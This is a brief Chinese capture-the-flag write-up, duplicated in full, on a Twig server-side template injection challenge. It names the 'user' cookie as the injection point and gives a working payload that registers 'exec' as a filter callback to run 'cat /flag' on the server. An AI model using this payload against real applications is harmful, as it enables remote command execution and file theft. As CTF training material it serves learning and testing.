0x00 知识点
Twig模板注入
链接:
https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig
0x01 解题
测试一下发现*wig模板注入
找注入点:
根据提示,cookie中的user是注入点
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};
Twig模板注入
链接:
https://www.k0rz3n.com/2018/11/12/一篇文章带你理解漏洞之SSTI漏洞/#2-Twig
测试一下发现*wig模板注入
找注入点:
根据提示,cookie中的user是注入点
payload:
{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}};